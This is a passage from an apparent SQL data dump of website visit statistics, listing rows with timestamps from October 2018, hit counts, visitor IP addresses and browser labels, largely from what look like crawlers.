,'46.229.168.139','other'),(313483,1538868524,1,1,0,0,'54.36.149.102','other'),(313484,1538868922,2,2,0,0,'66.249.65.211','chrome'),(313485,1538868924,1,1,0,0,'54.36.148.86','other'),(313486,1538869029,1,1,0,0,'66.249.65.209','chrome'),(313487,1538869089,1,1,0,0,'8.29.198.27','other'),(313488,1538869481,1,1,0,0,'8.29.198.26','other'),(313489,1538869750,1,1,0,0,'54.36.148.159','other'),(313490,1538869932,1,1,0,0,'54.36.148.39','other'),(313491,1538869982,1,1,0,0,'66.249.73.30','chrome'),(313492,1538869987,4,4,0,0,'66.249.65.211','chrome'),(313493,1538870213,1,1,0,0,'54.36.149.16','other'),(313494,1538870479,1,1,0,0,'54.36.148.79','other'),(313495,1538870526,3,3,0,0,'66.249.73.28','chrome'),(313496,1538870527,1,1,0,0,'66.249.65.209','chrome'),(313497,1538870575,1,1,0,0,'54.36.148.237','other'),(313498,1538870792,1,1,0,0,'54.36.149.62','other'),(313499,1538870890,1,1,0,0,'66.249.73.29','chrome'),(313500,1538871075,1,1,0,0,'54.36.149.5','other'),(313501,1538871090,1,1,0,0,'54.36.148.118','other'),(313502,1538871179,1,1,0,0,'91.209.11.236','other'),(313503,1538871349,1,1,0,0,'54.36.148.35','other'),(313504,1538871431,1,1,0,0,'54.36.148.96','other'),(313505,1538871462,2,2,0,0,'66.249.65.209','chrome'),(313506,1538871557,1,1,0,0,'207.46.13.92','other'),(313507,1538871920,1,1,0,0,'54.36.149.51','other'),(313508,1538872251,3,3,0,0,'216.244.66.241','other'),(313509,1538872649,1,1,0,0,'54.36.148.222','other'),(313510,1538872941,1,1,0,0,'54.36.148.26','other'),(313511,1538873135,1,1,0,0,'46.229.168.142','other'),(313512,1538873221,1,1,0,0,'54.36.149.3','other'),(313513,1538873231,1,1,0,0,'54.36.148.117','other'),(313514,1538873274,2,2,0,0,'54.36.148.212','other'),(313515,1538873485,1,1,0,0,'54.36.148.254','other'),(313516,1538873781,1,1,0,0,'54.36.148.247','other'),(313517,1538873929,1,1,0,0,'8.29.198.25','other'),(313518,1538875016,3,3,0,0,'66.249.65.213','chrome'),(313519,1538875387,1,1,0,0,'54.36.148.220','other'),(313520,1538875446,1,1,0,0,'54.36.148.179','other'),(313521,1538875595,1,1,0,0,'95.163.255.93','other'),(313522,1538875614,3,3,0,0,'216.244.66.241','other'),(313523,1538875821,1,1,0,0,'54.36.149.86','other'),(313524,1538875832,1,1,0,0,'54.36.148.187','other'),(313525,1538876100,1,1,0,0,'54.36.148.129','other'),(313526,1538876165,1,1,0,0,'54.36.148.48','other'),(313527,1538876649,1,1,0,0,'54.36.148.29','other'),(313528,1538876876,1,1,0,0,'66.249.65.213','chrome'),(313529,1538876984,1,1,0,0,'54.36.148.106','other'),(313530,1538877119,1,1,0,0,'66.249.65.209','chrome'),(313531,1538877501,1,1,0,0,'66.249.65.211','chrome'),(313532,1538877793,1,1,0,0,'37.17.172.132','firefox'),(313533,1538878232,2,2,0,0,'173.208.206.50','other'),(313534,1538878316,5,5,0,0,'216.244.66.241','other'),(313535,1538878577,1,1,0,0,'54.36.148.28','other'),(313536,1538878817,1,1,0,0,'54.36.148.159','other'),(313537,1538879591,1,1,0,0,'54.36.148.125','other'),(313538,1538879734,1,1,0,0,'46.4.67.206','other'),(313539,1538879926,1,1,0,0,'8.29.198.25','other'),(313540,1538880162,4,4,0,0,'216.244.66.241','other'),(313541,1538880238,1,1,0,0,'54.36.149.88','other'),(313542,1538880312,1,1,0,0,'8.29.198.27','other'),(313543,1538880483,1,1,0,0,'54.36.148.189','other'),(313544,1538880682,1,1,0,0,'54.36.148.161','other'),(313545,1538881093,1,1,0,0,'54.36.148.249','other'),(313546,1538881224,1,1,0,0,'66.249.65.209','chrome'),(313547,1538881279,3,3,0,0,'66.249.65.213','chrome'),(313548,1538881831,1,1,0,0,'54.36.149.59','other'),(313549,1538881858,1,1,0,0,'54.36.149.61','other'),(313550,1538881875,1,1,0,0,'54.36.148.139','other'),(313551,1538881993,1,1,0,0,'207.46.13.153','other'),(313552,1538882148,1,1,0,0,'66.249.65.209','chrome'),(313553,1538882433,2,2,0,0,'66.249.65.211','chrome'),(313554,1538882526,1,1,0,0,'54.36.149.93','other'),(313555,1538882549,1,1,0,0,'46.229.168.134','other'),(313556,1538882922,1,1,0,0,'178.154.244.29','other'),(313557,1538883064,1,1,0,0,'54.36.148.51','other'),(313558,1538883071,1,1,0,0,'54.36.148.35','other'),(313559,1538883078,1,1,0,0,'54.36.148.112','other'),(313560,1538883198,1,1,0,0,'54.36.148.190','other'),(313561,1538883307,1,1,0,0,'37.9.113.103','other'),(313562,1538883361,2,2,0,0,'213.180.203.40','other'),(313563,1538883423,3,3,0,0,'216.244.66.241','other'),(313564,1538883465,2,2,0,0,'66.249.73.29','chrome'),(313565,1538883723,1,1,0,0,'54.36.149.41','other'),(313566,1538883764,1,1,0,0,'213.180.203.17','other'),(313567,1538883878,1,1,0,0,'87.250.224.64','other'),(313568,1538883882,1,1,0,0,'141.8.142.144','other'),(313569,1538883886,1,1,0,0,'178.154.171.24','other'),(313570,1538884058,3,3,0,0,'66.249.73.30','chrome'),(313571,1538884080,1,1,0,0,'54.36.148.197','other'),(313572,1538884139,3,3,0,0,'66.249.65.211','chrome'),(313573,1538884151,4,4,0,0,'66.249.65.209','chrome'),(313574,1538884378,1,1,0,0,'54.36.148.121','other'),(313575,1538884381,1,1,0,0,'54.36.148.229','other'),(313576,1538884408,1,1,0,0,'5.255.253.38','other'),(313577,1538884487,1,1,0,0,'54.36.149.69','other'),(313578,1538884501,1,1,0,0,'54.36.148.119','other'),(313579,1538884532,1,1,0,0,'141.8.183.22','other'),(313580,1538884687,1,1,0,0,'178.154.171.30','other'),(313581,1538884700,1,1,0,0,'66.249.73.28','chrome'),(313582,1538884763,1,1,0,0,'8.29.198.26','other'),(313583,1538884989,1,1,0,0,'54.36.148.75','other'),(313584,1538885001,2,2,0,0,'66.249.65.213','chrome'),(313585,1538885122,2,2,0,0,'87.250.224.47','other'),(313586,1538885147,2,2,0,0,'66.249.65.209','chrome'),(313587,1538885479,1,1,0,0,'54.36.149.74','other'),(313588,1538885616,1,1,0,0,'37.9.113.103','other'),(313589,1538885620,1,1,0,0,'178.154.244.65','other'),(313590,1538885699,1,1,0,0,'46.229.168.139','other'),(313591,1538885852,1,1,0,0,'54.36.149.43','other'),(313592,1538886026,1,1,0,0,'66.249.65.211','chrome'),(313593,1538886127,3,3,0,0,'216.244.66.241','other'),(313594,1538886425,2,2,0,0,'66.249.65.213','chrome'),(313595,1538886454,1,1,0,0,'54.36.148.180','other'),(313596,1538886528,2,2,0,0,'66.249.65.209','chrome'),(313597,1538886697,1,1,0,0,'54.36.148.97','other'),(313598,1538886742,1,1,0,0,'54.36.149.96','other'),(313599,1538886932,1,1,0,0,'54.36.148.130','other'),(313600,1538887209,1,1,0,0,'54.36.148.231','other'),(313601,1538887523,1,1,0,0,'66.249.65.209','chrome'),(313602,1538887738,1,1,0,0,'54.36.149.49','other'),(313603,1538887765,1,1,0,0,'54.36.148.68','other'),(313604,1538887783,1,1,0,0,'54.36.149.28','other'),(313605,1538887801,1,1,0,0,'66.249.65.211','chrome'),(313606,1538887815,2,2,0,0,'216.244.66.241','other'),(313607,1538887924,1,1,0,0,'46.229.168.134','other'),(313608,1538888013,1,1,0,0,'54.36.148.73','other'),(313609,1538888068,1,1,0,0,'54.36.149.96','other'),(313610,1538888366,1,1,0,0,'46.229.168.142','other'),(313611,1538888613,1,1,0,0,'54.36.148.39','other'),(313612,1538888665,7,7,0,0,'91.121.86.136','other'),(313613,1538888861,1,1,0,0,'54.36.149.14','other'),(313614,1538889009,1,1,0,0,'54.36.148.195','other'),(313615,1538889212,1,1,0,0,'54.36.148.103','other'),(313616,1538889274,1,1,0,0,'180.76.15.21','other'),(313617,1538889363,1,1,0,0,'66.249.73.30','chrome'),(313618,1538889455,1,1,0,0,'91.196.178.100','chrome'),(313619,1538889631,1,1,0,0,'216.244.66.241','other'),(313620,1538889707,1,1,0,0,'66.249.65.213','chrome'),(313621,1538890050,1,1,0,0,'157.55.39.117','other'),(313622,1538890709,3,3,0,0,'66.249.65.209','chrome'),(313623,1538890728,1,1,0,0,'178.154.171.27','other'),(313624,1538890755,2,2,0,0,'8.29.198.27','other'),(313625,1538890792,3,3,0,0,'66.249.65.211','chrome'),(313626,1538890802,1,1,0,0,'54.36.149.1','other'),(313627,1538890866,1,1,0,0,'54.36.149.31','other'),(313628,1538890975,6,6,0,0,'66.249.65.213','chrome'),(313629,1538891019,1,1,0,0,'54.36.148.222','other'),(313630,1538891160,2,2,0,0,'54.36.149.89','other'),(313631,1538891308,1,1,0,0,'54.36.148.90','other'),(313632,1538891361,1,1,0,0,'54.36.148.84','other'),(313633,1538891935,5,5,0,0,'66.249.65.209','chrome'),(313634,1538891981,1,1,0,0,'54.36.149.56','other'),(313635,1538891998,1,1,0,0,'54.36.149.9','other'),(313636,1538892070,3,3,0,0,'66.249.65.211','chrome'),(313637,1538892286,1,1,0,0,'66.249.65.213','chrome'),(313638,1538892540,1,1,0,0,'54.36.148.200','other'),(313639,1538892583,1,1,0,0,'66.249.73.28','chrome'),(313640,1538892778,1,1,0,0,'54.36.149.27','other'),(313641,1538892898,1,1,0,0,'66.249.73.30','chrome'),(313642,1538893014,1,1,0,0,'207.46.13.92','other'),(313643,1538893133,1,1,0,0,'54.36.149.44','other'),(313644,1538893216,1,1,0,0,'37.17.172.132','firefox'),(313645,1538893276,1,1,0,0,'66.249.65.209','chrome'),(313646,1538893366,1,1,0,0,'54.36.148.244','other'),(313647,1538893455,1,1,0,0,'54.36.148.192','other'),(313648,1538894003,1,1,0,0,'2.62.211.46','chrome'),(313649,1538894091,1,1,0,0,'216.244.66.241','other'),(313650,1538894215,1,1,0,0,'54.36.148.70','other'),(313651,1538894260,2,2,0,0,'66.249.65.213','chrome'),(313652,1538894590,1,1,0,0,'54.36.149.59','other'),(313653,1538894628,1,1,0,0,'66.249.65.209','chrome'),(313654,1538894744,1,1,0,0,'178.255.215.94','other'),(313655,1538895055,1,1,0,0,'216.244.66.241','other'),(313656,1538895160,1,1,0,0,'46.229.168.146','other'),(313657,1538895313,1,1,0,0,'54.36.148.22','other'),(313658,1538895535,1,1,0,0,'66.249.65.211','chrome'),(313659,1538895591,1,1,0,0,'8.29.198.27','other'),(313660,1538895643,1,1,0,0,'54.36.148.180','other'),(313661,1538895809,1,1,0,0,'54.36.148.95','other'),(313662,1538895823,1,1,0,0,'54.36.148.195','other'),(313663,1538896013,1,1,0,0,'54.36.148.135','other'),(313664,1538896084,1,1,0,0,'95.163.255.97','other'),(313665,1538896339,2,2,0,0,'216.244.66.241','other'),(313666,1538896648,3,3,0,0,'66.249.65.209','chrome'),(313667,1538896840,1,1,0,0,'66.249.65.213','chrome'),(313668,1538896841,1,1,0,0,'54.36.148.212','other'),(313669,1538897039,1,1,0,0,'66.249.65.211','chrome'),(313670,1538897076,1,1,0,0,'66.249.73.29','chrome'),(313671,1538897143,1,1,0,0,'54.36.148.151','other'),(313672,1538897237,1,1,0,0,'54.36.148.119','other'),(313673,1538897264,1,1,0,0,'54.36.148.132','other'),(313674,1538897436,1,1,0,0,'54.36.148.154','other'),(313675,1538897705,1,1,0,0,'54.36.148.252','other'),(313676,1538897853,1,1,0,0,'66.249.73.30','chrome'),(313677,1538897900,1,1,0,0,'54.36.148.32','other'),(313678,1538897916,1,1,0,0,'54.36.148.70','other'),(313679,1538898028,1,1,0,0,'66.249.73.28','chrome'),(313680,1538898150,1,1,0,0,'54.36.148.31','other'),(313681,1538898256,2,2,0,0,'66.249.65.211','chrome'),(313682,1538898261,1,1,0,0,'66.249.65.209','chrome'),(313683,1538898439,1,1,0,0,'141.8.132.16','other'),(313684,1538898523,1,1,0,0,'54.36.148.120','other'),(313685,1538898715,1,1,0,0,'216.244.66.241','other'),(313686,1538899122,1,1,0,0,'37.54.23.36','chrome'),(313687,1538899166,1,1,0,0,'54.36.148.85','other'),(313688,1538899259,1,1,0,0,'46.229.168.138','other'),(313689,1538899608,1,1,0,0,'54.36.148.252','other'),(313690,1538899703,1,1,0,0,'91.196.178.51','chrome'),(313691,1538899826,1,1,0,0,'54.36.148.138','other'),(313692,1538899952,1,1,0,0,'54.36.148.136','other'),(313693,1538900004,1,1,0,0,'216.244.66.241','other'),(313694,1538900120,1,1,0,0,'54.36.149.13','other'),(313695,1538900148,1,1,0,0,'54.36.149.3','other'),(313696,1538900242,1,1,0,0,'66.249.65.209','chrome'),(313697,1538900677,1,1,0,0,'54.36.148.181','other'),(313698,1538901342,1,1,0,0,'54.36.149.62','other'),(313699,1538901446,1,1,0,0,'54.36.148.114','other'),(313700,1538901594,1,1,0,0,'8.29.198.26','other'),(313701,1538901601,1,1,0,0,'54.36.148.126','other'),(313702,1538901683,1,1,0,0,'54.36.148.10','other'),(313703,1538901955,1,1,0,0,'54.36.148.80','other'),(313704,1538901970,1,1,0,0,'8.29.198.27','other'),(313705,1538902146,1,1,0,0,'46.229.168.142','other'),(313706,1538902838,1,1,0,0,'54.36.148.216','other'),(313707,1538903700,1,1,0,0,'54.36.148.35','other'),(313708,1538904147,1,1,0,0,'66.249.73.30','chrome'),(313709,1538904155,1,1,0,0,'54.36.148.120','other'),(313710,1538904524,1,1,0,0,'54.36.149.9','other'),(313711,1538904745,1,1,0,0,'66.249.65.209','chrome'),(313712,1538905416,1,1,0,0,'54.36.149.89','other'),(313713,1538905514,1,1,0,0,'54.36.148.171','other'),(313714,1538905536,1,1,0,0,'37.17.172.132','firefox'),(313715,1538905634,1,1,0,0,'54.36.149.40','other'),(313716,1538905670,1,1,0,0,'54.36.148.63','other'),(313717,1538905896,1,1,0,0,'54.36.148.62','other'),(313718,1538906031,1,1,0,0,'87.250.224.47','other'),(313719,1538906425,1,1,0,0,'8.29.198.25','other'),(313720,1538907238,1,1,0,0,'54.36.148.170','other'),(313721,1538907565,1,1,0,0,'54.36.148.235','other'),(313722,1538907647,1,1,0,0,'66.249.73.28','chrome'),(313723,1538907656,1,1,0,0,'54.36.149.32','other'),(313724,1538908052,1,1,0,0,'54.36.148.209','other'),(313725,1538908798,1,1,0,0,'66.249.65.209','chrome'),(313726,1538908838,1,1,0,0,'54.36.148.54','other'),(313727,1538909092,1,1,0,0,'46.229.168.147','other'),(313728,1538909187,1,1,0,0,'54.36.148.21','other'),(313729,1538909381,1,1,0,0,'54.36.149.44','other'),(313730,1538909491,1,1,0,0,'54.36.148.254','other'),(313731,1538909565,3,3,0,0,'216.244.66.241','other'),(313732,1538909599,1,1,0,0,'54.36.148.88','other'),(313733,1538909751,1,1,0,0,'66.249.65.209','chrome'),(313734,1538909825,1,1,0,0,'54.36.148.58','other'),(313735,1538909935,1,1,0,0,'54.36.148.175','other'),(313736,1538909973,1,1,0,0,'157.55.39.117','other'),(313737,1538910139,1,1,0,0,'95.108.181.83','other'),(313738,1538910207,1,1,0,0,'66.249.73.28','chrome'),(313739,1538910572,1,1,0,0,'54.36.148.196','other'),(313740,1538911024,1,1,0,0,'54.36.148.125','other'),(313741,1538911282,1,1,0,0,'54.36.148.115','other'),(313742,1538911307,1,1,0,0,'54.36.148.91','other'),(313743,1538911572,1,1,0,0,'207.46.13.92','other'),(313744,1538911589,2,2,0,0,'66.249.65.211','chrome'),(313745,1538911868,1,1,0,0,'54.36.148.59','other'),(313746,1538911951,1,1,0,0,'46.229.168.134','other'),(313747,1538912012,1,1,0,0,'193.106.30.98','firefox'),(313748,1538912062,1,1,0,0,'54.36.148.187','other'),(313749,1538912147,2,2,0,0,'66.249.65.213','chrome'),(313750,1538912425,1,1,0,0,'8.29.198.27','other'),(313751,1538912632,1,1,0,0,'54.36.148.36','other'),(313752,1538912747,1,1,0,0,'54.36.148.10','other'),(313753,1538912798,1,1,0,0,'8.29.198.26','other'),(313754,1538913139,1,1,0,0,'216.244.66.241','other'),(313755,1538913177,1,1,0,0,'54.36.148.167','other'),(313756,1538913201,1,1,0,0,'54.36.148.225','other'),(313757,1538913256,1,1,0,0,'54.36.148.252','other'),(313758,1538913576,4,4,0,0,'66.249.65.211','chrome'),(313759,1538913650,1,1,0,0,'66.249.65.213','chrome'),(313760,1538913838,1,1,0,0,'66.249.73.30','chrome'),(313761,1538913855,2,2,0,0,'66.249.65.209','chrome'),(313762,1538913962,1,1,0,0,'54.36.149.107','other'),(313763,1538914177,1,1,0,0,'157.55.39.87','other'),(313764,1538914270,1,1,0,0,'54.36.148.123','other'),(313765,1538914276,1,1,0,0,'54.36.148.188','other'),(313766,1538914358,1,1,0,0,'54.36.148.232','other'),(313767,1538914572,1,1,0,0,'54.36.148.90','other'),(313768,1538914581,1,1,0,0,'54.36.148.56','other'),(313769,1538914691,1,1,0,0,'54.36.148.102','other'),(313770,1538914693,1,1,0,0,'54.36.148.186','other'),(313771,1538914940,1,1,0,0,'37.54.23.36','chrome'),(313772,1538914953,1,1,0,0,'54.36.149.68','other'),(313773,1538915013,3,3,0,0,'66.249.65.213','chrome'),(313774,1538915282,1,1,0,0,'95.163.255.92','other'),(313775,1538915437,3,3,0,0,'66.249.65.211','chrome'),(313776,1538915474,1,1,0,0,'54.36.148.162','other'),(313777,1538915662,3,3,0,0,'66.249.65.209','chrome'),(313778,1538915674,1,1,0,0,'54.36.148.83','other'),(313779,1538916081,1,1,0,0,'54.36.148.16','other'),(313780,1538916247,1,1,0,0,'54.36.148.74','other'),(313781,1538916397,1,1,0,0,'54.36.148.21','other'),(313782,1538916729,1,1,0,0,'54.36.149.9','other'),(313783,1538916812,1,1,0,0,'54.36.149.39','other'),(313784,1538916884,1,1,0,0,'54.36.148.185','other'),(313785,1538917027,1,1,0,0,'54.36.148.39','other'),(313786,1538917257,1,1,0,0,'8.29.198.26','other'),(313787,1538917348,1,1,0,0,'95.211.180.200','chrome'),(313788,1538917455,2,2,0,0,'216.244.66.241','other'),(313789,1538917508,1,1,0,0,'178.154.244.29','other'),(313790,1538917613,1,1,0,0,'66.249.65.211','chrome'),(313791,1538917701,1,1,0,0,'54.36.148.225','other'),(313792,1538917711,1,1,0,0,'157.55.39.117','other'),(313793,1538917712,1,1,0,0,'66.249.65.209','chrome'),(313794,1538917787,1,1,0,0,'54.36.148.238','other'),(313795,1538917963,1,1,0,0,'46.229.168.135','other'),(313796,1538918052,1,1,0,0,'54.36.148.241','other'),(313797,1538918479,1,1,0,0,'54.36.149.99','other'),(313798,1538918878,1,1,0,0,'54.36.148.192','other'),(313799,1538919008,1,1,0,0,'54.36.148.240','other'),(313800,1538919204,1,1,0,0,'54.36.148.144','other'),(313801,1538920020,1,1,0,0,'54.36.148.173','other'),(313802,1538920515,1,1,0,0,'46.229.168.144','other'),(313803,1538920637,1,1,0,0,'54.36.148.92','other'),(313804,1538920791,1,1,0,0,'54.36.148.63','other'),(313805,1538921043,1,1,0,0,'54.36.148.89','other'),(313806,1538921375,1,1,0,0,'54.36.149.81','other'),(313807,1538921576,1,1,0,0,'54.36.148.61','other'),(313808,1538921669,1,1,0,0,'54.36.149.27','other'),(313809,1538921840,2,2,0,0,'66.249.65.209','chrome'),(313810,1538921862,1,1,0,0,'54.36.148.202','other'),(313811,1538921937,1,1,0,0,'54.36.149.89','other'),(313812,1538922409,2,2,0,0,'178.154.244.29','other'),(313813,1538922646,2,2,0,0,'216.244.66.241','other'),(313814,1538922663,1,1,0,0,'95.216.5.188','other'),(313815,1538922700,1,1,0,0,'54.36.148.194','other'),(313816,1538922737,1,1,0,0,'66.249.65.211','chrome'),(313817,1538922742,1,1,0,0,'54.36.148.113','other'),(313818,1538922861,1,1,0,0,'54.36.149.53','other'),(313819,1538923005,1,1,0,0,'54.36.148.229','other'),(313820,1538923257,1,1,0,0,'8.29.198.27','other'),(313821,1538923371,1,1,0,0,'46.229.168.138','other'),(313822,1538923528,1,1,0,0,'54.36.148.82','other'),(313823,1538923631,1,1,0,0,'8.29.198.25','other'),(313824,1538923733,1,1,0,0,'54.36.148.91','other'),(313825,1538923838,1,1,0,0,'54.36.149.106','other'),(313826,1538923920,1,1,0,0,'54.36.148.208','other'),(313827,1538924071,1,1,0,0,'54.36.148.93','other'),(313828,1538924382,1,1,0,0,'54.36.149.35','other'),(313829,1538924401,1,1,0,0,'66.249.65.213','chrome'),(313830,1538924608,1,1,0,0,'216.244.66.241','other'),(313831,1538925039,1,1,0,0,'54.36.148.129','other'),(313832,1538925276,1,1,0,0,'54.36.149.80','other'),(313833,1538925373,1,1,0,0,'54.36.148.34','other'),(313834,1538925659,1,1,0,0,'54.36.148.186','other'),(313835,1538925778,2,2,0,0,'66.249.65.209','chrome'),(313836,1538925883,1,1,0,0,'13.66.139.0','other'),(313837,1538925994,1,1,0,0,'178.154.244.11','other'),(313838,1538926168,1,1,0,0,'40.77.167.21','other'),(313839,1538926216,2,2,0,0,'66.249.65.213','chrome'),(313840,1538926219,1,1,0,0,'54.36.148.165','other'),(313841,1538926272,1,1,0,0,'54.36.148.72','other'),(313842,1538926424,1,1,0,0,'66.249.65.211','chrome'),(313843,1538926601,1,1,0,0,'54.36.149.19','other'),(313844,1538926605,1,1,0,0,'54.36.148.78','other'),(313845,1538927026,1,1,0,0,'54.36.148.121','other'),(313846,1538927075,1,1,0,0,'46.211.100.221','chrome'),(313847,1538927202,2,2,0,0,'66.249.73.28','chrome'),(313848,1538927283,4,4,0,0,'216.244.66.241','other'),(313849,1538927313,1,1,0,0,'54.36.148.38','other'),(313850,1538927629,1,1,0,0,'54.36.149.45','other'),(313851,1538927762,1,1,0,0,'54.36.149.27','other'),(313852,1538928095,1,1,0,0,'8.29.198.26','other'),(313853,1538928569,1,1,0,0,'66.249.65.211','chrome'),(313854,1538928614,1,1,0,0,'54.36.148.40','other'),(313855,1538928802,1,1,0,0,'54.36.148.79','other'),(313856,1538928973,1,1,0,0,'54.36.149.43','other'),(313857,1538929204,1,1,0,0,'37.17.172.132','firefox'),(313858,1538929309,1,1,0,0,'18.196.114.239','msie'),(313859,1538929389,1,1,0,0,'54.36.149.97','other'),(313860,1538929573,1,1,0,0,'54.36.148.229','other'),(313861,1538929650,1,1,0,0,'66.249.65.213','chrome'),(313862,1538929904,1,1,0,0,'66.249.65.211','chrome'),(313863,1538930151,1,1,0,0,'54.36.148.81','other'),(313864,1538930244,1,1,0,0,'54.36.149.2','other'),(313865,1538930415,1,1,0,0,'54.36.149.30','other'),(313866,1538931154,1,1,0,0,'54.36.149.56','other'),(313867,1538931237,1,1,0,0,'54.36.148.146','other'),(313868,1538931685,1,1,0,0,'54.36.148.42','other'),(313869,1538932161,1,1,0,0,'66.249.65.209','chrome'),(313870,1538932249,1,1,0,0,'54.36.148.135','other'),(313871,1538932671,1,1,0,0,'54.36.149.73','other'),(313872,1538932715,1,1,0,0,'54.36.148.206','other'),(313873,1538932771,1,1,0,0,'95.132.62.154','other'),(313874,1538932886,1,1,0,0,'66.249.65.211','chrome'),(313875,1538933100,1,1,0,0,'54.36.148.51','other'),(313876,1538933293,1,1,0,0,'66.249.65.213','chrome'),(313877,1538933335,1,1,0,0,'54.36.148.65','other'),(313878,1538933349,1,1,0,0,'54.36.148.72','other'),(313879,1538933551,1,1,0,0,'54.36.149.82','other'),(313880,1538933887,1,1,0,0,'54.36.148.77','other'),(313881,1538934090,1,1,0,0,'8.29.198.25','other'),(313882,1538934373,1,1,0,0,'54.36.149.37','other'),(313883,1538934458,1,1,0,0,'8.29.198.26','other'),(313884,1538934503,1,1,0,0,'54.36.149.8','other'),(313885,1538934508,1,1,0,0,'54.36.149.14','other'),(313886,1538934650,2,2,0,0,'66.249.65.213','chrome'),(313887,1538934708,1,1,0,0,'54.36.148.249','other'),(313888,1538934725,3,3,0,0,'216.244.66.241','other'),(313889,1538934740,1,1,0,0,'157.55.39.117','other'),(313890,1538935235,1,1,0,0,'54.36.148.208','other'),(313891,1538935258,1,1,0,0,'66.249.65.209','chrome'),(313892,1538935683,2,2,0,0,'216.244.66.241','other'),(313893,1538935877,1,1,0,0,'46.229.168.143','other'),(313894,1538935897,1,1,0,0,'54.36.148.218','other'),(313895,1538935948,1,1,0,0,'54.36.149.47','other'),(313896,1538935991,1,1,0,0,'54.36.149.74','other'),(313897,1538936145,1,1,0,0,'54.36.148.221','other'),(313898,1538936541,1,1,0,0,'66.249.73.30','chrome'),(313899,1538936736,1,1,0,0,'54.36.148.119','other'),(313900,1538936805,1,1,0,0,'54.36.149.17','other'),(313901,1538937400,1,1,0,0,'91.196.178.133','firefox'),(313902,1538937525,1,1,0,0,'193.194.124.227','chrome'),(313903,1538937787,1,1,0,0,'54.36.149.20','other'),(313904,1538937849,1,1,0,0,'54.36.148.51','other'),(313905,1538937889,1,1,0,0,'54.36.148.147','other'),(313906,1538938079,1,1,0,0,'54.36.148.110','other'),(313907,1538938256,1,1,0,0,'54.36.148.14','other'),(313908,1538938270,1,1,0,0,'95.163.255.98','other'),(313909,1538938395,1,1,0,0,'54.36.148.16','other'),(313910,1538938463,1,1,0,0,'54.36.148.70','other'),(313911,1538938493,1,1,0,0,'66.249.73.28','chrome'),(313912,1538938541,1,1,0,0,'54.36.148.30','other'),(313913,1538938741,1,1,0,0,'54.36.148.156','other'),(313914,1538938755,1,1,0,0,'66.249.64.195','chrome'),(313915,1538938928,1,1,0,0,'8.29.198.27','other'),(313916,1538939107,1,1,0,0,'54.36.148.57','other'),(313917,1538939238,1,1,0,0,'141.8.142.103','other'),(313918,1538939373,5,5,0,0,'178.154.244.29','other'),(313919,1538939393,1,1,0,0,'62.141.39.8','chrome'),(313920,1538939796,1,1,0,0,'54.36.148.232','other'),(313921,1538940155,2,2,0,0,'178.154.244.11','other'),(313922,1538940242,1,1,0,0,'54.36.149.69','other'),(313923,1538940432,1,1,0,0,'95.108.181.75','other'),(313924,1538940447,1,1,0,0,'54.36.148.225','other'),(313925,1538940452,2,2,0,0,'178.154.244.29','other'),(313926,1538940455,1,1,0,0,'66.249.64.199','chrome'),(313927,1538940461,1,1,0,0,'54.36.148.151','other'),(313928,1538940507,1,1,0,0,'66.249.64.201','chrome'),(313929,1538940643,1,1,0,0,'5.45.207.19','other'),(313930,1538940647,1,1,0,0,'87.250.224.47','other'),(313931,1538941095,1,1,0,0,'54.36.148.102','other'),(313932,1538941109,1,1,0,0,'54.36.148.36','other'),(313933,1538941143,1,1,0,0,'54.36.148.49','other'),(313934,1538941205,1,1,0,0,'54.36.149.16','other'),(313935,1538941293,1,1,0,0,'87.250.224.65','other'),(313936,1538941423,1,1,0,0,'5.45.207.79','other'),(313937,1538941428,1,1,0,0,'54.36.148.154','other'),(313938,1538941623,1,1,0,0,'54.36.148.214','other'),(313939,1538941659,1,1,0,0,'141.8.142.103','other'),(313940,1538941770,1,1,0,0,'46.229.168.147','other'),(313941,1538941839,1,1,0,0,'54.36.148.252','other'),(313942,1538941841,1,1,0,0,'178.154.244.29','other'),(313943,1538942053,1,1,0,0,'87.250.224.47','other'),(313944,1538942107,1,1,0,0,'178.154.244.11','other'),(313945,1538942177,1,1,0,0,'37.9.113.103','other'),(313946,1538942314,1,1,0,0,'54.36.149.90','other'),(313947,1538942347,2,2,0,0,'66.249.64.199','chrome'),(313948,1538942637,5,5,0,0,'216.244.66.241','other'),(313949,1538942742,1,1,0,0,'5.45.207.19','other'),(313950,1538942780,1,1,0,0,'54.36.148.141','other'),(313951,1538942836,1,1,0,0,'46.229.168.129','other'),(313952,1538942851,1,1,0,0,'199.59.150.180','other'),(313953,1538942991,1,1,0,0,'207.46.13.92','other'),(313954,1538943267,1,1,0,0,'54.36.149.4','other'),(313955,1538943343,1,1,0,0,'54.36.148.106','other'),(313956,1538943883,1,1,0,0,'66.249.64.201','chrome'),(313957,1538943890,1,1,0,0,'66.249.64.199','chrome'),(313958,1538944092,1,1,0,0,'54.36.149.9','other'),(313959,1538944108,1,1,0,0,'216.244.65.4','chrome'),(313960,1538944219,1,1,0,0,'178.154.244.29','other'),(313961,1538944468,1,1,0,0,'207.46.13.92','other'),(313962,1538944507,1,1,0,0,'54.36.148.119','other'),(313963,1538944915,1,1,0,0,'8.29.198.27','other'),(313964,1538945255,1,1,0,0,'54.36.148.153','other'),(313965,1538945264,2,2,0,0,'216.244.66.241','other'),(313966,1538945289,1,1,0,0,'8.29.198.25','other'),(313967,1538945327,1,1,0,0,'54.165.59.7','other'),(313968,1538945396,1,1,0,0,'54.36.148.255','other'),(313969,1538945536,1,1,0,0,'54.36.148.17','other'),(313970,1538945672,1,1,0,0,'54.36.149.7','other'),(313971,1538945927,2,2,0,0,'66.249.64.195','chrome'),(313972,1538946083,1,1,0,0,'54.36.148.234','other'),(313973,1538946622,1,1,0,0,'66.249.64.199','chrome'),(313974,1538946911,1,1,0,0,'54.36.148.29','other'),(313975,1538947187,1,1,0,0,'54.36.148.175','other'),(313976,1538947308,1,1,0,0,'54.36.148.81','other'),(313977,1538947395,1,1,0,0,'54.36.148.111','other'),(313978,1538947703,3,3,0,0,'216.244.66.241','other'),(313979,1538947754,1,1,0,0,'54.36.148.213','other'),(313980,1538947763,1,1,0,0,'37.204.189.240','msie'),(313981,1538947804,1,1,0,0,'207.46.13.92','other'),(313982,1538947859,1,1,0,0,'66.249.64.195','chrome'),(313983,1538947910,4,4,0,0,'66.249.64.199','chrome'),(313984,1538947935,1,1,0,0,'66.249.64.57','chrome'),(313985,1538948152,1,1,0,0,'54.36.149.61','other'),(313986,1538948394,1,1,0,0,'66.249.64.201','chrome'),(313987,1538948436,1,1,0,0,'54.36.149.64','other'),(313988,1538948500,1,1,0,0,'54.36.148.104','other'),(313989,1538948745,1,1,0,0,'54.36.148.79','other'),(313990,1538948789,1,1,0,0,'54.36.149.101','other'),(313991,1538948956,1,1,0,0,'54.36.149.63','o